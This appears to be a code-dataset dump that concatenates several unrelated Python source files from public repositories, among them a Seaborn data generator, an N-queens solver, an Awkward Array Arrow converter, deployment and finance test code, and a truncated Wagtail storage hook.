max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
Python/Seaborn/generate_data.py | Gjacquenot/training-material | 115 | 12749472 | <filename>Python/Seaborn/generate_data.py
#!/usr/bin/env python
import numpy as np
nr_data = 100
gaussian = np.random.normal(loc=1.5, scale=2.0, size=nr_data)
poisson = np.random.poisson(lam=5.0, size=nr_data)
labels = np.random.choice(['A', 'B', 'C', 'D'], size=nr_data)
x = np.linspace(0.0, 100.0, nr_data)
y = 1.3*x + 2.0 + np.random.normal(scale=8, size=nr_data)
x1 = np.random.choice(np.arange(1, 10, 1), size=nr_data)
y1 = 1.3*x1 + 2.0 + np.random.normal(scale=1.5, size=nr_data)
x2 = np.sort(np.random.gamma(3, scale=4, size=nr_data))
y2 = 1.3*x2 + 2.0 + np.random.normal(scale=1.5, size=nr_data)
binary = np.random.choice(np.array(['yes', 'no']), size=nr_data)
x3 = x2.copy()
y3 = np.where(binary == 'yes', 1.3, 1.9)*x3 + \
np.where(binary == 'yes', 2.0, -1.0) + \
np.random.normal(size=nr_data)
with open('Data/data.txt', 'w') as file:
print('gaussian,poisson,label,x,y,x1,y1,x2,y2,binary,x3,y3',file=file)
for i in range(nr_data):
print(f'{gaussian[i]},{poisson[i]},{labels[i]},{x[i]},{y[i]},'
f'{x1[i]},{y1[i]},{x2[i]},{y2[i]},{binary[i]},'
f'{x3[i]},{y3[i]}',
file=file)
|
Chapter3/queens.py | trenton3983/ClassicComputerScienceProblemsInPython | 792 | 12749494 | <filename>Chapter3/queens.py<gh_stars>100-1000
# queens.py
# From Classic Computer Science Problems in Python Chapter 3
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from csp import Constraint, CSP
from typing import Dict, List, Optional
class QueensConstraint(Constraint[int, int]):
def __init__(self, columns: List[int]) -> None:
super().__init__(columns)
self.columns: List[int] = columns
def satisfied(self, assignment: Dict[int, int]) -> bool:
# q1c = queen 1 column, q1r = queen 1 row
for q1c, q1r in assignment.items():
# q2c = queen 2 column
for q2c in range(q1c + 1, len(self.columns) + 1):
if q2c in assignment:
q2r: int = assignment[q2c] # q2r = queen 2 row
if q1r == q2r: # same row?
return False
if abs(q1r - q2r) == abs(q1c - q2c): # same diagonal?
return False
return True # no conflict
if __name__ == "__main__":
columns: List[int] = [1, 2, 3, 4, 5, 6, 7, 8]
rows: Dict[int, List[int]] = {}
for column in columns:
rows[column] = [1, 2, 3, 4, 5, 6, 7, 8]
csp: CSP[int, int] = CSP(columns, rows)
csp.add_constraint(QueensConstraint(columns))
solution: Optional[Dict[int, int]] = csp.backtracking_search()
if solution is None:
print("No solution found!")
else:
print(solution) |
corehq/util/__init__.py | omari-funzone/commcare-hq | 471 | 12749515 | import json as stdlib_json # Don't conflict with `corehq.util.json`
from traceback import format_exception_only
from django.utils.functional import Promise
from .couch import get_document_or_404 # noqa: F401
from .view_utils import reverse # noqa: F401
def flatten_list(elements):
return [item for sublist in elements for item in sublist]
def flatten_non_iterable_list(elements):
# actually iterate over the list and ensure element to avoid conversion of strings to chars
# ['abc'] => ['a', 'b', 'c']
items = []
for element in elements:
if isinstance(element, list):
items.extend(flatten_non_iterable_list(element))
else:
items.append(element)
return items
def eval_lazy(value):
if isinstance(value, Promise):
value = value._proxy____cast()
return value
def cmp(a, b):
"""Comparison function for Python 3
https://stackoverflow.com/a/22490617/10840
"""
return (a > b) - (a < b)
def as_text(value):
"""Safely convert object to text"""
if isinstance(value, str):
return value
if isinstance(value, bytes):
return value.decode("utf8", errors="backslashreplace")
if isinstance(value, BaseException):
lines = format_exception_only(type(value), value)
return "\n".join(x.rstrip("\n") for x in lines)
return repr(value)
def as_json_text(value):
if value is None:
return ''
if isinstance(value, dict):
try:
return stdlib_json.dumps(value, indent=2)
except TypeError:
pass
return as_text(value)
|
src/awkward/_v2/operations/convert/to_arrow.py | scikit-hep/awkward-1.0 | 519 | 12749541 | <reponame>scikit-hep/awkward-1.0<filename>src/awkward/_v2/operations/convert/to_arrow.py
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from __future__ import absolute_import
import distutils
import awkward as ak
np = ak.nplike.NumpyMetadata.instance()
def _import_pyarrow(name): # move this to _util
try:
import pyarrow
except ImportError:
raise ImportError(
"""to use {0}, you must install pyarrow:
pip install pyarrow
or
conda install -c conda-forge pyarrow
""".format(
name
)
)
else:
if distutils.version.LooseVersion(
pyarrow.__version__
) < distutils.version.LooseVersion("5.0.0"):
raise ImportError("pyarrow 5.0.0 or later required for {0}".format(name))
return pyarrow
def to_arrow(
array, list_to32=False, string_to32=True, bytestring_to32=True, allow_tensor=True
):
pass
# """
# Args:
# array: Data to convert to an Apache Arrow array.
# list_to32 (bool): If True, convert Awkward lists into 32-bit Arrow lists
# if they're small enough, even if it means an extra conversion. Otherwise,
# signed 32-bit #ak.layout.ListOffsetArray maps to Arrow `ListType` and
# all others map to Arrow `LargeListType`.
# string_to32 (bool): Same as the above for Arrow `string` and `large_string`.
# bytestring_to32 (bool): Same as the above for Arrow `binary` and `large_binary`.
# allow_tensor (bool): If True, convert regular-length lists to `pyarrow.lib.Tensor`;
# otherwise, make `pyarrow.lib.ListArray` (generating offsets). This is used
# by #ak.to_parquet, since Parquet files can't contain regular-length tensors.
# Converts an Awkward Array into an Apache Arrow array.
# This produces arrays of type `pyarrow.Array`. You might need to further
# manipulations (using the pyarrow library) to build a `pyarrow.ChunkedArray`,
# a `pyarrow.RecordBatch`, or a `pyarrow.Table`.
# Arrow arrays can maintain the distinction between "option-type but no elements are
# missing" and "not option-type" at all levels except the top level. Also, there is
# no distinction between `?union[X, Y, Z]]` type and `union[?X, ?Y, ?Z]` type. Be
# aware of these type distinctions when passing data through Arrow or Parquet.
# See also #ak.from_arrow, #ak.to_arrow_table, #ak.to_parquet.
# """
# pyarrow = _import_pyarrow("ak.to_arrow")
# layout = to_layout(array, allow_record=False, allow_other=False)
# def recurse(layout, mask, is_option):
# if isinstance(layout, ak.layout.NumpyArray):
# numpy_arr = numpy.asarray(layout)
# length = len(numpy_arr)
# arrow_type = pyarrow.from_numpy_dtype(numpy_arr.dtype)
# if issubclass(numpy_arr.dtype.type, (bool, np.bool_)):
# if numpy_arr.ndim == 1:
# if len(numpy_arr) % 8 == 0:
# ready_to_pack = numpy_arr
# else:
# ready_to_pack = numpy.empty(
# int(numpy.ceil(len(numpy_arr) / 8.0)) * 8,
# dtype=numpy_arr.dtype,
# )
# ready_to_pack[: len(numpy_arr)] = numpy_arr
# ready_to_pack[len(numpy_arr) :] = 0
# numpy_arr = numpy.packbits(
# ready_to_pack.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# else:
# return recurse(
# from_numpy(numpy_arr, regulararray=True, highlevel=False),
# mask,
# is_option,
# )
# if numpy_arr.ndim == 1:
# if mask is not None:
# return pyarrow.Array.from_buffers(
# arrow_type,
# length,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(numpy_arr)],
# )
# else:
# return pyarrow.Array.from_buffers(
# arrow_type, length, [None, pyarrow.py_buffer(numpy_arr)]
# )
# elif allow_tensor:
# return pyarrow.Tensor.from_numpy(numpy_arr)
# else:
# return recurse(
# from_numpy(numpy_arr, regulararray=True, highlevel=False),
# mask,
# is_option,
# )
# elif isinstance(layout, ak.layout.EmptyArray):
# return pyarrow.Array.from_buffers(pyarrow.null(), 0, [None])
# elif isinstance(layout, ak.layout.ListOffsetArray32):
# offsets = numpy.asarray(layout.offsets, dtype=np.int32)
# if layout.parameter("__array__") == "bytestring":
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.binary(),
# len(offsets) - 1,
# [
# None,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.binary(),
# len(offsets) - 1,
# [
# pyarrow.py_buffer(mask),
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# return arrow_arr
# if layout.parameter("__array__") == "string":
# if mask is None:
# arrow_arr = pyarrow.StringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# )
# else:
# arrow_arr = pyarrow.StringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# pyarrow.py_buffer(mask),
# )
# return arrow_arr
# content_buffer = recurse(layout.content[: offsets[-1]], None, False)
# content_type = pyarrow.list_(content_buffer.type).value_field.with_nullable(
# isinstance(
# ak.operations.describe.type(layout.content), ak.types.OptionType
# )
# )
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.list_(content_type),
# len(offsets) - 1,
# [None, pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.list_(content_type),
# len(offsets) - 1,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# return arrow_arr
# elif isinstance(
# layout,
# (ak.layout.ListOffsetArray64, ak.layout.ListOffsetArrayU32),
# ):
# if layout.parameter("__array__") == "bytestring":
# downsize = bytestring_to32
# elif layout.parameter("__array__") == "string":
# downsize = string_to32
# else:
# downsize = list_to32
# offsets = numpy.asarray(layout.offsets)
# if downsize and offsets[-1] <= np.iinfo(np.int32).max:
# small_layout = ak.layout.ListOffsetArray32(
# ak.layout.Index32(offsets.astype(np.int32)),
# layout.content,
# parameters=layout.parameters,
# )
# return recurse(small_layout, mask, is_option)
# offsets = numpy.asarray(layout.offsets, dtype=np.int64)
# if layout.parameter("__array__") == "bytestring":
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_binary(),
# len(offsets) - 1,
# [
# None,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_binary(),
# len(offsets) - 1,
# [
# pyarrow.py_buffer(mask),
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# ],
# children=[],
# )
# return arrow_arr
# if layout.parameter("__array__") == "string":
# if mask is None:
# arrow_arr = pyarrow.LargeStringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# )
# else:
# arrow_arr = pyarrow.LargeStringArray.from_buffers(
# len(offsets) - 1,
# pyarrow.py_buffer(offsets),
# pyarrow.py_buffer(layout.content),
# pyarrow.py_buffer(mask),
# )
# return arrow_arr
# content_buffer = recurse(layout.content[: offsets[-1]], None, False)
# content_type = pyarrow.list_(content_buffer.type).value_field.with_nullable(
# isinstance(
# ak.operations.describe.type(layout.content), ak.types.OptionType
# )
# )
# if mask is None:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_list(content_type),
# len(offsets) - 1,
# [None, pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# else:
# arrow_arr = pyarrow.Array.from_buffers(
# pyarrow.large_list(content_type),
# len(offsets) - 1,
# [pyarrow.py_buffer(mask), pyarrow.py_buffer(offsets)],
# children=[content_buffer],
# )
# return arrow_arr
# elif isinstance(layout, ak.layout.RegularArray):
# return recurse(
# layout.broadcast_tooffsets64(layout.compact_offsets64()),
# mask,
# is_option,
# )
# elif isinstance(
# layout,
# (
# ak.layout.ListArray32,
# ak.layout.ListArrayU32,
# ak.layout.ListArray64,
# ),
# ):
# return recurse(
# layout.broadcast_tooffsets64(layout.compact_offsets64()),
# mask,
# is_option,
# )
# elif isinstance(layout, ak.layout.RecordArray):
# values = [
# recurse(x[: len(layout)], mask, is_option) for x in layout.contents
# ]
# min_list_len = min(map(len, values))
# types = pyarrow.struct(
# [
# pyarrow.field(layout.key(i), values[i].type).with_nullable(
# isinstance(ak.operations.describe.type(x), ak.types.OptionType)
# )
# for i, x in enumerate(layout.contents)
# ]
# )
# if mask is not None:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [pyarrow.py_buffer(mask)], children=values
# )
# else:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [None], children=values
# )
# elif isinstance(
# layout,
# (
# ak.layout.UnionArray8_32,
# ak.layout.UnionArray8_64,
# ak.layout.UnionArray8_U32,
# ),
# ):
# tags = numpy.asarray(layout.tags)
# index = numpy.asarray(layout.index)
# copied_index = False
# if mask is not None:
# bytemask = (
# numpy.unpackbits(mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(tags)]
# values = []
# for tag, content in enumerate(layout.contents):
# selected_tags = tags == tag
# this_index = index[selected_tags]
# if mask is not None:
# length = int(numpy.ceil(len(this_index) / 8.0)) * 8
# if len(numpy.unique(this_index)) == len(this_index):
# this_bytemask = numpy.zeros(length, dtype=np.uint8)
# this_bytemask[this_index] = bytemask[selected_tags]
# else:
# this_bytemask = numpy.empty(length, dtype=np.uint8)
# this_bytemask[: len(this_index)] = bytemask[selected_tags]
# this_bytemask[len(this_index) :] = 0
# content = content[this_index]
# this_index = numpy.arange(len(this_index))
# if not copied_index:
# copied_index = True
# index = numpy.array(index, copy=True)
# index[selected_tags] = this_index
# this_mask = numpy.packbits(
# this_bytemask.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# else:
# this_mask = None
# values.append(recurse(content, this_mask, is_option))
# types = pyarrow.union(
# [
# pyarrow.field(str(i), values[i].type).with_nullable(
# is_option
# or isinstance(layout.content(i).type, ak.types.OptionType)
# )
# for i in range(len(values))
# ],
# "dense",
# list(range(len(values))),
# )
# return pyarrow.Array.from_buffers(
# types,
# len(layout.tags),
# [
# None,
# pyarrow.py_buffer(tags),
# pyarrow.py_buffer(index.astype(np.int32)),
# ],
# children=values,
# )
# elif isinstance(
# layout,
# (
# ak.layout.IndexedArray32,
# ak.layout.IndexedArrayU32,
# ak.layout.IndexedArray64,
# ),
# ):
# index = numpy.asarray(layout.index)
# if layout.parameter("__array__") == "categorical":
# dictionary = recurse(layout.content, None, False)
# if mask is None:
# return pyarrow.DictionaryArray.from_arrays(index, dictionary)
# else:
# bytemask = (
# numpy.unpackbits(~mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(index)]
# return pyarrow.DictionaryArray.from_arrays(
# index, dictionary, bytemask
# )
# else:
# layout_content = layout.content
# if len(layout_content) == 0:
# empty = recurse(layout_content, None, False)
# if mask is None:
# return empty
# else:
# return pyarrow.array([None] * len(index)).cast(empty.type)
# elif isinstance(layout_content, ak.layout.RecordArray):
# values = [
# recurse(x[: len(layout_content)][index], mask, is_option)
# for x in layout_content.contents
# ]
# min_list_len = min(map(len, values))
# types = pyarrow.struct(
# [
# pyarrow.field(
# layout_content.key(i), values[i].type
# ).with_nullable(
# isinstance(
# ak.operations.describe.type(x), ak.types.OptionType
# )
# )
# for i, x in enumerate(layout_content.contents)
# ]
# )
# if mask is not None:
# return pyarrow.Array.from_buffers(
# types,
# min_list_len,
# [pyarrow.py_buffer(mask)],
# children=values,
# )
# else:
# return pyarrow.Array.from_buffers(
# types, min_list_len, [None], children=values
# )
# else:
# return recurse(layout_content[index], mask, is_option)
# elif isinstance(
# layout,
# (ak.layout.IndexedOptionArray32, ak.layout.IndexedOptionArray64),
# ):
# index = numpy.array(layout.index, copy=True)
# nulls = index < 0
# index[nulls] = 0
# if layout.parameter("__array__") == "categorical":
# dictionary = recurse(layout.content, None, False)
# if mask is None:
# bytemask = nulls
# else:
# bytemask = (
# numpy.unpackbits(~mask)
# .reshape(-1, 8)[:, ::-1]
# .reshape(-1)
# .view(np.bool_)
# )[: len(index)]
# bytemask[nulls] = True
# return pyarrow.DictionaryArray.from_arrays(index, dictionary, bytemask)
# else:
# if len(nulls) % 8 == 0:
# this_bytemask = (~nulls).view(np.uint8)
# else:
# length = int(numpy.ceil(len(nulls) / 8.0)) * 8
# this_bytemask = numpy.empty(length, dtype=np.uint8)
# this_bytemask[: len(nulls)] = ~nulls
# this_bytemask[len(nulls) :] = 0
# this_bitmask = numpy.packbits(
# this_bytemask.reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# if isinstance(layout, ak.layout.IndexedOptionArray32):
# next = ak.layout.IndexedArray32(
# ak.layout.Index32(index), layout.content
# )
# else:
# next = ak.layout.IndexedArray64(
# ak.layout.Index64(index), layout.content
# )
# if mask is None:
# return recurse(next, this_bitmask, True)
# else:
# return recurse(next, mask & this_bitmask, True)
# elif isinstance(layout, ak.layout.BitMaskedArray):
# bitmask = numpy.asarray(layout.mask, dtype=np.uint8)
# if layout.lsb_order is False:
# bitmask = numpy.packbits(
# numpy.unpackbits(bitmask).reshape(-1, 8)[:, ::-1].reshape(-1)
# )
# if layout.valid_when is False:
# bitmask = ~bitmask
# return recurse(layout.content[: len(layout)], bitmask, True).slice(
# length=min(len(bitmask) * 8, len(layout.content))
# )
# elif isinstance(layout, ak.layout.ByteMaskedArray):
# mask = numpy.asarray(layout.mask, dtype=np.bool_) == layout.valid_when
# bytemask = numpy.zeros(
# 8 * math.ceil(len(layout.content) / 8), dtype=np.bool_
# )
# bytemask[: len(mask)] = mask
# bytemask[len(mask) :] = 0
# bitmask = numpy.packbits(bytemask.reshape(-1, 8)[:, ::-1].reshape(-1))
# return recurse(layout.content[: len(layout)], bitmask, True).slice(
# length=len(mask)
# )
# elif isinstance(layout, (ak.layout.UnmaskedArray)):
# return recurse(layout.content, None, True)
# elif isinstance(layout, (ak.layout.VirtualArray)):
# return recurse(layout.array, None, False)
# elif isinstance(layout, (ak.partition.PartitionedArray)):
# return pyarrow.chunked_array(
# [recurse(x, None, False) for x in layout.partitions]
# )
# else:
# raise TypeError(
# "unrecognized array type: {0}".format(repr(layout))
# + ak._util.exception_suffix(__file__)
# )
# return recurse(layout, None, False)
|
tests/test_finance.py | GabrielWen/spartan | 156 | 12749542 | import unittest
import sys
import test_common
from spartan import expr, util
from spartan.expr import eager
from spartan.examples import finance
maturity = 10.0
rate = 0.005
volatility = 0.001
class TestFinance(test_common.ClusterTest):
def setUp(self):
if not hasattr(self, 'current'):
self.current = eager(expr.abs(10 + expr.randn(10)))
self.strike = eager(expr.abs(20 + expr.randn(10)))
def test_call(self):
put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
#util.log_info(call)
util.log_info(call.glom())
def test_put(self):
put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
#util.log_info(put)
#util.log_info(optimize(put))
util.log_info(put.glom())
def test_find_change(self):
arr = expr.randn(100)
movers = finance.find_change(arr)
#util.log_info(optimize(movers))
util.log_info(movers.glom())
def test_print_graph(self):
put, call = finance.black_scholes(self.current, self.strike, maturity, rate, volatility)
#print put.dot()
def test_predict_price(self):
bid = expr.randn(100)
ask = expr.randn(100)
res = finance.predict_price(bid, ask, 5).optimized()
#print res
#print res.optimized()
print res.glom()
if __name__ == '__main__':
unittest.main(argv=sys.argv[:1])
|
deploy-agent/deployd/types/ping_report.py | brennentsmith/teletraan | 2,449 | 12749564 | # Copyright 2016 Pinterest, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from deployd.types.deploy_stage import DeployStage
from deployd.types.agent_status import AgentStatus
class PingReport(object):
def __init__(self, jsonValue=None):
self.deployId = None
self.envId = None
self.envName = None
self.stageName = None
self.deployStage = None
self.status = None
self.errorCode = 0
self.errorMessage = None
self.failCount = 0
self.extraInfo = None
self.deployAlias = None
if jsonValue:
self.deployId = jsonValue.get('deployId')
self.envId = jsonValue.get('envId')
if isinstance(jsonValue.get('deployStage'), int):
self.deployStage = DeployStage._VALUES_TO_NAMES[jsonValue.get('deployStage')]
else:
self.deployStage = jsonValue.get('deployStage')
if isinstance(jsonValue.get('status'), int):
self.status = AgentStatus._VALUES_TO_NAMES[jsonValue.get('status')]
else:
self.status = jsonValue.get('status')
self.envName = jsonValue.get('envName')
self.stageName = jsonValue.get('stageName')
self.errorCode = jsonValue.get('errorCode')
self.errorMessage = jsonValue.get('errorMessage')
self.failCount = jsonValue.get('failCount')
self.extraInfo = jsonValue.get('extraInfo')
self.deployAlias = jsonValue.get('deployAlias')
def __str__(self):
return "PingReport(deployId={}, envId={}, deployStage={}, status={}, " \
"errorCode={}), errorMessage={}, failCount={}, extraInfo={}, " \
"deployAlias={})".format(self.deployId, self.envId, self.deployStage,
self.status, self.errorCode, self.errorMessage,
self.failCount, self.extraInfo, self.deployAlias,)
|
anglepy/funcs.py | strin/nips14-ssl | 496 | 12749593 | import numpy as np
import anglepy.ndict as ndict
# FuncLikelihood
class FuncLikelihood():
def __init__(self, x, model, n_batch):
self.x = x
self.model = model
self.n_batch = n_batch
self.n_datapoints = x.itervalues().next().shape[1]
if self.n_datapoints%(self.n_batch) != 0:
print self.n_datapoints, self.n_batch
raise BaseException()
self.blocksize = self.n_batch
self.n_minibatches = self.n_datapoints/self.blocksize
def subval(self, i, w, z):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
return self.model.logpxz(w, _x, _z)
def subgrad(self, i, w, z):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
logpx, logpz, g, _ = self.model.dlogpxz_dwz(w, _x, _z)
return logpx, logpz, g
def val(self, w, z):
if self.n_minibatches==1: return self.subval(0, w, z)
logpx, logpz = tuple(zip(*[self.subval(i, w, z) for i in range(self.n_minibatches)]))
return np.hstack(logpx), np.hstack(logpz)
def grad(self, w, z):
if self.n_minibatches==1: return self.subgrad(0, w, z)
logpxi, logpzi, gwi, _ = tuple(zip(*[self.subgrad(i, w, z) for i in range(self.n_minibatches)]))
return np.hstack(logpxi), np.hstack(logpzi), ndict.sum(gwi)
# FuncPosterior
class FuncPosterior():
def __init__(self, likelihood, model):
self.ll = likelihood
self.model = model
self.n_minibatches = likelihood.n_minibatches
self.blocksize = likelihood.blocksize
def subval(self, i, w, z):
prior = self.model.logpw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
logpx, logpz = self.ll.subval(i, w, z)
return logpx.sum() + logpz.sum() + prior_weight * prior
def subgrad(self, i, w, z):
logpx, logpz, gw = self.ll.subgrad(i, w, z)
logpw, gw_prior = self.model.dlogpw_dw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
for j in gw: gw[j] += prior_weight * gw_prior[j]
return logpx.sum() + logpz.sum() + prior_weight * logpw, gw
def val(self, w, z={}):
logpx, logpz = self.ll.val(w, z)
return logpx.sum() + logpz.sum() + self.model.logpw(w)
def grad(self, w, z={}):
logpx, logpz, gw = self.ll.grad(w, z)
prior, gw_prior = self.model.dlogpw_dw(w)
for i in gw: gw[i] += gw_prior[i]
return logpx.sum() + logpz.sum() + prior, gw
# Parallel version of likelihood
# Before using, start ipython cluster, e.g.:
# shell>ipcluster start -n 4
from IPython.parallel.util import interactive
import IPython.parallel
class FuncLikelihoodPar():
def __init__(self, x, model, n_batch):
raise Exception("TODO")
self.x = x
self.c = c = IPython.parallel.Client()
self.model = model
self.n_batch = n_batch
self.clustersize = len(c)
print 'ipcluster size = '+str(self.clustersize)
n_train = x.itervalues().next().shape[1]
if n_train%(self.n_batch*len(c)) != 0: raise BaseException()
self.blocksize = self.n_batch*len(c)
self.n_minibatches = n_train/self.blocksize
# Get pointers to slaves
c.block = False
# Remove namespaces on slaves
c[:].clear()
# Execute stuff on slaves
module, function, args = self.model.constr
c[:].push({'args':args,'x':x}).wait()
commands = [
'import os; cwd = os.getcwd()',
'import sys; sys.path.append(\'../shared\')',
'import anglepy.ndict as ndict',
'import '+module,
'my_n_batch = '+str(n_batch),
'my_model = '+module+'.'+function+'(**args)'
]
for cmd in commands: c[:].execute(cmd).get()
# Import data on slaves
for i in range(len(c)):
_x = ndict.getCols(x, i*(n_train/len(c)), (i+1)*(n_train/len(c)))
c[i].push({'my_x':_x})
c[:].pull(['my_x']).get()
def subval(self, i, w, z):
raise Exception("TODO")
# Replaced my_model.nbatch with my_n_batch, this is UNTESTED
@interactive
def ll(w, z, k):
_x = ndict.getCols(my_x, k*my_n_batch, (k+1)*my_n_batch) #@UndefinedVariable
if z == None:
return my_model.logpxmc(w, _x), None #@UndefinedVariable
else:
return my_model.logpxz(w, _x, z) #@UndefinedVariable
tasks = []
for j in range(len(self.c)):
_z = z
if _z != None:
_z = ndict.getCols(z, j*self.n_batch, (j+1)*self.n_batch)
tasks.append(self.c.load_balanced_view().apply_async(ll, w, _z, i))
res = [task.get() for task in tasks]
raise Exception("TODO: implementation with uncoupled logpx and logpz")
return sum(res)
def subgrad(self, i, w, z):
@interactive
def dlogpxz_dwz(w, z, k):
_x = ndict.getCols(my_x, k*my_n_batch, (k+1)*my_n_batch).copy() #@UndefinedVariable
if z == None:
logpx, gw = my_model.dlogpxmc_dw(w, _x) #@UndefinedVariable
return logpx, None, gw, None
else:
return my_model.dlogpxz_dwz(w, _x, z) #@UndefinedVariable
tasks = []
for j in range(len(self.c)):
_z = z
if _z != None:
_z = ndict.getCols(z, j*self.n_batch, (j+1)*self.n_batch)
tasks.append(self.c.load_balanced_view().apply_async(dlogpxz_dwz, w, _z, i))
res = [task.get() for task in tasks]
v, gw, gz = res[0]
for k in range(1,len(self.c)):
vi, gwi, gzi = res[k]
v += vi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return v, gw, gz
def grad(self, w, z=None):
v, gw, gz = self.subgrad(0, w, z)
for i in range(1, self.n_minibatches):
vi, gwi, gzi = self.subgrad(i, w, z)
v += vi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return v, gw, gz
def val(self, w, z=None):
logpx, logpz = self.subval(0, w, z)
for i in range(1, self.n_minibatches):
_logpx, _logpz = self.subval(i, w, z)
logpx += _logpx
logpz += _logpz
return logpx, logpz
def grad(self, w, z=None):
logpx, logpz, gw, gz = self.subgrad(0, w, z)
for i in range(1, self.n_minibatches):
logpxi, logpzi, gwi, gzi = self.subgrad(i, w, z)
logpx += logpxi
logpz += logpzi
for j in gw: gw[j] += gwi[j]
for j in gz: gz[j] += gzi[j]
return logpx, logpz, gw, gz
# Helper function
def getColsZX(self, w, z, i):
_x = ndict.getCols(self.x, i*self.n_batch, (i+1)*self.n_batch)
if z != None:
_z = ndict.getCols(z, i*self.n_batch, (i+1)*self.n_batch)
return _z, _x
# Monte Carlo FuncLikelihood
class FuncLikelihoodMC():
def __init__(self, x, model, n_mc_samples):
self.x = x
self.model = model
self.n_mc_samples = n_mc_samples
self.n_minibatches = x.itervalues().next().shape[1]
def subval(self, i, w):
_x = ndict.getCols(self.x, i, i+1)
return self.model.logpxmc(w, _x, self.n_mc_samples)
def subgrad(self, i, w):
_x = ndict.getCols(self.x, i, i+1)
logpx, gw = self.model.dlogpxmc_dw(w, _x, self.n_mc_samples)
return logpx, gw
def val(self, w):
logpx = [self.subval(i, w) for i in range(self.n_minibatches)]
return np.hstack(logpx)
def grad(self, w):
logpxi, gwi = tuple(zip(*[self.subgrad(i, w) for i in range(self.n_minibatches)]))
return np.hstack(logpxi), ndict.sum(gwi)
# FuncPosterior
class FuncPosteriorMC():
def __init__(self, likelihood, model):
self.ll = likelihood
self.model = model
self.n_minibatches = likelihood.n_minibatches
def subval(self, i, w):
prior = self.model.logpw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
logpx = self.ll.subval(i, w)
return logpx.sum(), logpx.sum() + prior_weight * prior
def subgrad(self, i, w):
logpx, gw = self.ll.subgrad(i, w)
v_prior, gw_prior = self.model.dlogpw_dw(w)
prior_weight = 1. / float(self.ll.n_minibatches)
v = logpx.sum() + prior_weight * v_prior
for j in gw: gw[j] += prior_weight * gw_prior[j]
return logpx.sum(), v, gw
def val(self, w):
logpx = self.ll.val(w)
v = logpx.sum() + self.model.logpw(w)
return logpx.sum(), v
def grad(self, w):
logpx, gw = self.ll.grad(w)
v_prior, gw_prior = self.model.dlogpw_dw(w)
v = logpx.sum() + v_prior
for i in gw: gw[i] += gw_prior[i]
return logpx.sum(), v, gw
|
processor/__init__.py | SeongSuKim95/Re-ID-baseline | 297 | 12749640 | from .processor import do_train, do_inference |
pclpy/tests/test_eigen.py | toinsson/pclpy | 293 | 12749661 | import pytest
import numpy as np
import pclpy
def test_eigen_vectorxf():
a = np.array([1, 1, 1, 1], "f")
vec = pclpy.pcl.vectors.VectorXf(a)
assert np.allclose(np.array(vec), a)
|
tbx/core/wagtail_hooks.py | elviva404/wagtail-torchbox | 103 | 12749668 | from django.core.files.storage import get_storage_class
from django.shortcuts import redirect
from django.utils.cache import add_never_cache_headers
from storages.backends.s3boto3 import S3Boto3Storage
from wagtail.core import hooks
from wagtail.documents import get_document_model
from wagtail.documents.models import document_served
@hooks.register("before_serve_document", order=100)
def serve_document_from_s3(document, request):
